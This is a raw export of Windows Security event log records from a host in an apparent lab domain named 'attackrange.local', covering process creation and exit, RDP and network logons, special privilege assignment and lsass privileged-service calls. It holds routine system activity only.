Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278821
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Windows\System32\csrss.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1b14
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278820
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b14
New Process Name: C:\Windows\System32\smss.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x140
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: \SystemRoot\System32\smss.exe 000000d4 0000007c
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278819
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBD38F5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 174.27.138.219
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): NTLM V2
Key Length: 128
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278818
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBD38F5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4776
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Credential Validation
OpCode=Info
RecordNumber=278817
Keywords=Audit Success
Message=The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: Administrator
Source Workstation:
Error Code: 0x0
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278816
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 908
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 174.27.138.219
Source Port: 60809
Destination Address: 10.0.1.15
Destination Port: 3389
Protocol: 6
Filter Information:
Filter Run-Time ID: 66639
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278861
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1184
Process Name: C:\Windows\System32\LogonUI.exe
Exit Status: 0x0
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278860
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xab8
Process Name: C:\Windows\System32\AtBroker.exe
Exit Status: 0x1
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278859
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
New Process ID: 0xab8
New Process Name: C:\Windows\System32\AtBroker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x1f4
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: atbroker.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278858
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xbec
Process Name: C:\Windows\System32\rdpclip.exe
Exit Status: 0x0
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=278857
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBDFD01
Logon Type: 10
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278856
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\NETWORK SERVICE
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Target Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
New Process ID: 0xbec
New Process Name: C:\Windows\System32\rdpclip.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x38c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: rdpclip
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278855
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1148
New Process Name: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278854
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1578
New Process Name: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x26c
Creator Process Name: C:\Windows\System32\services.exe
Process Command Line: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278853
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Privileges: SeAssignPrimaryTokenPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278852
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x26c
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278851
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
New Process ID: 0x16e0
New Process Name: C:\Windows\System32\TSTheme.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\TSTheme.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278850
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278849
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278848
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278847
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBDFD01
Privileges: SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278846
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 10
Restricted Admin Mode: No
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBDFD01
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x454
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: WIN-HOST-5
Source Network Address: 174.27.138.219
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278845
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon GUID: {00000000-0000-0000-0000-000000000000}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0x454
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Network Address: 174.27.138.219
Port: 0
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4776
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Credential Validation
OpCode=Info
RecordNumber=278844
Keywords=Audit Success
Message=The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: Administrator
Source Workstation: WIN-HOST-5
Error Code: 0x0
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278843
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278842
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278841
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278840
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278839
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278838
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278837
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278836
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278835
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
